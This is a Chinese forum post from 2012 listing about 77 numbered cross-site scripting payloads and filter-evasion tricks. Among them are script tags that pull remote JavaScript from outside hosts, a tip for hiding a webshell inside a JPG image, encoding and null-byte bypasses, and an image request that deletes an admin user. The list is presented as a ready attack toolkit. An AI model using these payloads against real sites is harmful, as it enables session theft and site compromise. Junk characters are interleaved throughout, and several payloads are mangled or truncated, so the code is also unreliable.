跨站图片shell
4 Y4 n y7 i5 f9 k* J7 K+ M# { W* MXSS跨站代码 <script>alert("")</script>+ V1 S6 m- J: B7 |& U2 }
" h* C5 w% P3 l/ p! |' ?) J. V将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马
1 p% k/ V+ c3 f5 |# I( `, }- M9 Q% L. a7 s
4 n# c2 p2 Z/ O
- K) k+ [! r: o W3 \3 f7 p$ }0 T1)普通的XSS JavaScript注入
; D2 m; r& b1 H/ ?<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>/ y6 _: ^, ?$ d) _5 T& f; R/ E$ @5 Z
6 g" x C) q* g, N8 \, ^9 E
(2)IMG标签XSS使用JavaScript命令
" l& ~0 Y) X) U7 z! o% C<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
# \& m* n1 t( M) S2 d- _, U0 N2 W$ u6 a/ k$ A( v3 A
(3)IMG标签无分号无引号4 `6 a+ r4 L4 A9 i( w
<IMG SRC=javascript:alert(‘XSS’)>) Y1 O4 D# W( L6 e
; R& i, K- j; a+ l2 u4 y* _0 J
(4)IMG标签大小写不敏感 J, l3 K7 j! z
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>* d+ B' G0 U8 @% B
: x* ^: P+ J6 ?9 T) ^1 m0 T
(5)HTML编码(必须有分号)
a. o; w t/ o<IMG SRC=javascript:alert(“XSS”)>1 C% M* Z9 `! u9 @* P$ V. `' j. L
. g; A3 y9 h& I1 g2 f# _8 P) i& |(6)修正缺陷IMG标签
* o6 q3 X' z2 v' ~! v& i: Q<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>: k# K0 G9 {; \7 p5 a9 Y5 ?4 N! J
5 e7 k! v9 G) ^2 x+ O) g(7)formCharCode标签(计算器)
) K# q" q0 V# x<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>0 ~3 k$ s4 @# u; ?3 U: |
$ y. b4 ]$ n0 P' y7 m( J' N(8)UTF-8的Unicode编码(计算器)% f9 j6 J! f x/ Y6 n: m7 _0 V V K
<IMG SRC=jav..省略..S')>% R! M: L( L/ i2 R$ n+ b
2 q. H! X7 j- i& P" E8 i
(9)7位的UTF-8的Unicode编码是没有分号的(计算器). N6 t2 b( m+ k9 Z+ _' @7 d* D
<IMG SRC=jav..省略..S')>
8 e( a# V) h5 Q0 @/ D9 z/ C0 [) W: R' K( q" m
(10)十六进制编码也是没有分号(计算器)
' X% D1 y1 y7 U+ k" i& }<IMG SRC=java..省略..XSS')>3 h6 F: y; o* ]) k% Y- A F6 t
, m6 m7 b3 ]& P4 U; n" r n$ d(11)嵌入式标签,将Javascript分开
4 D% z" T* R4 ]; K4 i7 [<IMG SRC=”jav ascript:alert(‘XSS’);”>
) }) I( T7 j7 L- [/ M, G
* e7 ?$ G. B8 R4 O(12)嵌入式编码标签,将Javascript分开
0 X5 p4 N4 G4 O3 c& a<IMG SRC=”jav ascript:alert(‘XSS’);”>9 r# q- b1 v; F2 r! h1 `
! e% ^. }1 w" }
(13)嵌入式换行符
5 m% F6 i* v; w$ Z5 ~2 H* O2 X<IMG SRC=”jav ascript:alert(‘XSS’);”>
! K+ _" H$ Q0 F3 z8 J, x$ _9 f* F% y* v# S
(14)嵌入式回车
: q( L) G3 P* T- x<IMG SRC=”jav ascript:alert(‘XSS’);”> _3 J2 l5 p D* a! n" H$ l" k
' [# S k K! F; V(15)嵌入式多行注入JavaScript,这是XSS极端的例子
4 z! I0 X4 y7 |/ |, @<IMG SRC=”javascript:alert(‘XSS‘)”>& c% T. }: ~! r* y8 p3 L8 y1 i. |" Z( X
7 E( n6 F8 |0 B: L5 R2 b# _(16)解决限制字符(要求同页面)5 w" ~/ E. l% f3 K2 N
<script>z=’document.’</script>+ I3 |3 ~1 E% K/ J' ?
<script>z=z+’write(“‘</script>
, S$ w n4 G ~) m$ e' H" j<script>z=z+’<script’</script>" n/ v" [/ S" c+ j
<script>z=z+’ src=ht’</script>0 p* ~$ w. q% D
<script>z=z+’tp://ww’</script> q) M2 @: J; i7 |
<script>z=z+’w.shell’</script>) A; |9 `5 w' \, ^" t: } x
<script>z=z+’.net/1.’</script>
9 o/ w; ?0 N& F/ C) B/ g# o<script>z=z+’js></sc’</script>
) m; s& O, V# K: S5 V0 [$ x<script>z=z+’ript>”)’</script>
( k) y: U1 { f/ t: E<script>eval_r(z)</script>
" \4 c4 q! a/ ^1 k
7 q+ o8 r4 ?7 Q4 ]+ T- [9 f(17)空字符
l# y0 y# _* C. u6 h- {/ g E9 ~. Nperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out4 e8 v- o2 u+ m8 a& ]
8 j. p. Y1 p- V2 X: w
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
" Y7 K& @5 a+ a- r/ ?" @7 c1 Zperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
9 e2 D9 ^% n3 g
. v; p' y3 p+ ~% s* K- q0 M(19)Spaces和meta前的IMG标签3 O. {: a2 T& C
<IMG SRC=” javascript:alert(‘XSS’);”>
: b8 ~. V( D: ^6 d8 J8 G( R. x: g- S* L
(20)Non-alpha-non-digit XSS
" m, n/ F: W' t5 J$ n0 C<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
2 J+ G& h5 c; }, n$ L6 |2 ^
8 |, ?4 T% v& I' _ H9 {(21)Non-alpha-non-digit XSS to 2
3 R" `9 e8 Q9 n' f! ~/ |9 x<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
4 b! l; b' r$ K7 O2 q$ Z, [9 ?& L' I' }, R5 O' o. f
(22)Non-alpha-non-digit XSS to 3
% K) S+ ]7 h3 W, ?0 ^8 _<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT> G. Z+ n) S' R, P3 I( ]0 m
6 [# t; s. g) ~9 V0 Y* `
(23)双开括号" m9 M* ~0 B5 g2 @$ a: s
<<SCRIPT>alert(“XSS”);//<</SCRIPT>: `; L3 q8 K d2 O( \
8 {/ \8 }* L) }
(24)无结束脚本标记(仅火狐等浏览器)2 S' `8 g1 c4 l7 k5 m6 r
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>2 v9 V& }# z8 I- T \& S
9 u- P1 y8 g. r2 Z(25)无结束脚本标记2
; o: ~ x# B. f0 p; E: U: A( ~<SCRIPT SRC=//3w.org/XSS/xss.js>' K' e t0 L: G, E+ F
$ @: h) @7 b1 b! o' _. q(26)半开的HTML/JavaScript XSS5 w: j& ~* c. S) x- U+ y6 M
<IMG SRC=”javascript:alert(‘XSS’)”
* {& ^% v5 r. T5 n
) Y7 s1 K* c7 R% T* z( R% I n(27)双开角括号
. a1 ?; v! q" Y& I6 Y5 i<iframe src=http://3w.org/XSS.html </ G5 F3 x, u: n6 I( x7 K4 n
n; o! a! v+ t6 X/ D' v& Y
(28)无单引号 双引号 分号
$ n) H* D p( H$ z7 j<SCRIPT>a=/XSS/9 x! h/ j1 _! y0 a5 q6 j
alert(a.source)</SCRIPT>
# g. S6 }( t) p' A' o" c, ^4 v9 t$ q. N- U2 ]: ?1 _* L, n. D& \
(29)换码过滤的JavaScript
. l) _! d% e. y4 T7 L\”;alert(‘XSS’);//
8 h2 J% l7 x- n3 o" D/ L0 M$ q: P8 Q9 B1 W
(30)结束Title标签
! F. g6 S/ p H9 w( w" G7 h</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>1 L. ^+ D" ~! f& m& m. l' ]
( ?/ O$ {1 H, c: p(31)Input Image
- K5 F. d% \0 C- {6 _3 h8 k<INPUT SRC=”javascript:alert(‘XSS’);”>$ D" r1 h4 J8 \
- q+ M% U# B6 X( {! t
(32)BODY Image
3 l+ W8 E( r: M<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
8 U V" K6 \1 v$ V: Q4 s% g3 f7 b% X
(33)BODY标签9 ]( @% C- M. c
<BODY(‘XSS’)>9 V, F6 p1 Q8 {8 T$ p \
4 }9 x; d D- o& [7 d: N2 Y
(34)IMG Dynsrc
5 ~/ d, Y4 o% o<IMG DYNSRC=”javascript:alert(‘XSS’)”>3 C( f- O" j& ~9 Y, u6 o6 Q" I
0 O: b, F, b6 v& j# a! K9 g$ A6 `
(35)IMG Lowsrc4 Q9 e- A: I: u* ?
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
- m: x! w. V3 g. O7 X- f- d5 B4 q0 p* G: r3 P
(36)BGSOUND* E. Q+ {$ @1 Y3 T& x
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
6 y0 ?" m; S0 b$ M2 H
" U4 N r! {: {(37)STYLE sheet
6 F+ @7 ]9 C9 U+ ]<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>5 `/ T% X. \% C: t1 e7 _
9 ]- j5 a! n0 O) v(38)远程样式表& z6 d: Q; P$ `% t Z
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
: y2 d3 n. q/ X5 r/ o( Q
* t' B+ }7 o; I9 V4 ?7 c(39)List-style-image(列表式)
" z4 _0 ^$ v1 p3 u% @& U<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
& ]9 V% g' S8 I: T) ^: G: @
0 m1 \$ o6 n. {. }. Q(40)IMG VBscript
) p3 n( N$ q( D' Z$ F3 U9 S7 P<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
2 ~3 R: r0 R( a: s
+ u2 O3 B; @6 _, R(41)META链接url
5 W L5 K* }0 ^<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
( R' Q; |4 G4 g8 ~! ^/ z1 ? C% v- Q, e) B, d K2 q
(42)Iframe5 P2 [% E, U. |
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>8 W1 b+ Y& e; I9 D; p& w
(43)Frame
7 L6 W9 a; Q6 h* g, M9 V<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>5 _& @6 @( q2 K; A4 E1 J: a# x) G
' N) F& W6 t; \6 K+ L(44)Table6 R( \' R& Y( F$ T, }
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>$ M- r- v% N! `7 O
/ J$ X/ x8 J# C2 J
(45)TD+ i; r) a) _# d5 u5 k+ q
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
1 g, d8 N* T9 j; }# ]1 |, a M' n( R, J( P) n4 h! o+ j
(46)DIV background-image& l" u. D1 I% A0 o% ]
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>0 y3 F6 v) i' [0 ?/ I
2 [3 c" _3 z: [% B, H8 {) P
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
8 G U9 M2 W' E M<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>$ y1 e0 R" ?) K3 A4 X
4 B$ c8 b( u1 ~% k9 I4 c: S
(48)DIV expression$ N5 {9 i8 ?3 s+ d# N2 P
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
/ O5 V* _0 q5 g3 O9 m( f: u1 Q" i# `+ D2 |
(49)STYLE属性分拆表达
( i# t( i8 N4 H; `9 |<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>2 N7 G1 Z% [& Y0 `# G$ S
, s9 k9 q( o. g+ a1 @& B+ Y
(50)匿名STYLE(组成:开角号和一个字母开头)1 e- q4 {. `, l A
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
. V6 {# x) C: k R: ^/ @6 P O" J' r7 v& c) h
(51)STYLE background-image. y) e9 S; y1 f0 c5 K* p. Z8 V. ~
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
# k7 S; ]/ ~( B) D( i! b& h( W9 M; N1 {. c" j* o4 x* C% o: Z
(52)IMG STYLE方式( B8 C5 c2 g6 G7 M, r7 V
exppression(alert(“XSS”))’> f" q6 w4 x( }+ ]' H% G/ b
- {1 v8 l- _! F9 ]0 b& G
(53)STYLE background
! |8 Y# }6 D, G1 S( `0 O0 ^8 }( e<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
1 q {' o8 N6 Q+ u$ C9 Z+ S+ Z5 ]1 S1 K( n8 [. o/ F7 ^* U( W
(54)BASE
3 V6 t) u+ z) T+ p7 |<BASE HREF=”javascript:alert(‘XSS’);//”>+ x* L8 E# m9 Z: q0 C% f
( K. _# K3 g9 A" o! z
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS2 H; p0 g# o% R# g, i. z! ^* @
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
3 A; h* p3 t" [5 w- U
# K( J# @8 ^- G& l3 h8 j(56)在flash中使用ActionScrpt可以混进你XSS的代码
$ s! U) i! y9 Ka=”get”;3 O3 F5 E; i/ s0 {- n& M
b=”URL(\”";4 ?2 |/ t) n0 S6 j+ D( f
c=”javascript:”; \$ G' S8 h _ N' j% V/ ]
d=”alert(‘XSS’);\”)”;5 ?; E- z6 |- E) [
eval_r(a+b+c+d);' b4 ?9 }+ I5 g
- Q: w G* o9 D* k+ a1 M$ s1 z, }
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
& u/ q# _! l2 i8 ` O0 v- J<HTML xmlns:xss>
' y# ]# ^: K- _$ x' Y: W<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
7 k5 D+ E; u& ~ g1 [4 J<xss:xss>XSS</xss:xss>
- C2 H) U4 ~. t. x</HTML>
2 k; X3 K9 ~5 O! ]. e Z% O, m! U3 W1 F, [/ c% Y& T9 D
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用, P" T$ ?1 k. l
<SCRIPT SRC=””></SCRIPT>
3 c8 w4 y. @' q9 a; D! W
' T+ U: \" d0 ]5 h(59)IMG嵌入式命令,可执行任意命令2 V$ `" K1 _- C! G, K# V1 l! F
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
$ ]( [9 u$ o* }" f6 R7 J$ i8 n6 H- T7 T# ]# x% Y" j
(60)IMG嵌入式命令(a.jpg在同服务器)
9 F, Q0 C7 t0 Q/ J+ P: HRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
3 e, T; i( e6 y3 z, O, b' W K) |
(61)绕符号过滤
/ V& \' P1 v- I0 }& M# r3 A9 O( W! p<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
( }, Q5 Y/ K; E0 P, x$ F. L- X7 s
(62)6 e2 j3 y, q# M
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
$ X; K2 T+ y! c0 k! N8 T, b* T: ?3 t5 Y% F: r, V7 r
(63)
" w8 l7 M1 Y$ v. h: A; ~5 M<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>$ b& k6 Z$ S" m( D* Q
7 e0 p' x# W+ F" ~(64)3 f3 L" Q( ^" E: n4 T
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
: a& o3 Z1 m# i& B) p. u' l5 e+ m$ k) R# J8 h5 |* x' h
(65)
9 m f3 n5 ]2 I+ C4 l0 ]<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>8 j* I* ~3 L) K( x' Y3 `
% h. l* M# N$ Y: x& a2 Z
(66)
' N; ~ v1 r# V; c9 B<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
. ]; d$ a9 L* \9 T
4 T8 O: v( O8 R; I7 L, s9 J& D& y(67)
2 w7 O( F2 F. d# L; }<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>$ {& x- d3 h% y) F
& X6 G& o! H o }(68)URL绕行
3 X$ l0 `/ [ K3 ?<A HREF=”http://127.0.0.1/”>XSS</A># r9 l/ [* O3 W. ?, K
, ]7 v) u9 q0 s5 i! F8 r7 `
(69)URL编码
1 O0 H8 i7 Z' t/ O# V6 N8 P! {* g$ o<A HREF=”http://3w.org”>XSS</A>2 c1 M# T1 ^( e6 r
- d! [% `; x e# Y2 J
(70)IP十进制* r Q6 y1 E; Q4 R3 W/ o3 G& w
<A HREF=”http://3232235521″>XSS</A>
P+ B, E8 Q# ]! V5 L; U" A: k0 V& n* V4 `4 e. t/ p
(71)IP十六进制 k O; @- J% p) V! @
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
7 H- a e/ f* \+ c# y
5 X. K4 L$ G$ ~) p3 J- d% u3 c3 j) I- k(72)IP八进制5 b: w5 Z' M' U2 Z6 r/ U
<A HREF=”http://0300.0250.0000.0001″>XSS</A>8 B ?3 T/ n0 G: n3 s0 f
6 J! h' Q6 [3 v/ J2 n) |
(73)混合编码
: R$ [+ s0 p* L! W2 L c% A) {* R; C<A HREF=”h
5 U1 R5 i f2 m4 O G( ]tt p://6 6.000146.0×7.147/”">XSS</A>3 K: U! G& r ]
- M% x/ S: i$ J" G(74)节省[http:]) @ R, ]; ^' u& E7 o* p4 D( O
<A HREF=”//www.google.com/”>XSS</A>
! a7 a$ j5 ~( n% [0 r1 g% b
/ y6 i" L! ~8 m2 A# p' J(75)节省[www]
$ M3 t" ^( Y; v<A HREF=”http://google.com/”>XSS</A>
$ X7 r% r g( r4 _# Q8 r
- W' f8 p( T- ~(76)绝对点绝对DNS! L; L# q+ D- y7 ~5 `0 `- z+ @
<A HREF=”http://www.google.com./”>XSS</A>
* Q; j( E: i$ Q) q0 P4 B/ W$ g1 u) T' y6 G1 h
(77)javascript链接; f# G5 M0 S4 E
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>) P* R% Y% w! A# s9 W) j
|
发表于 2012-9-13 17:04:56
收藏
支持
反对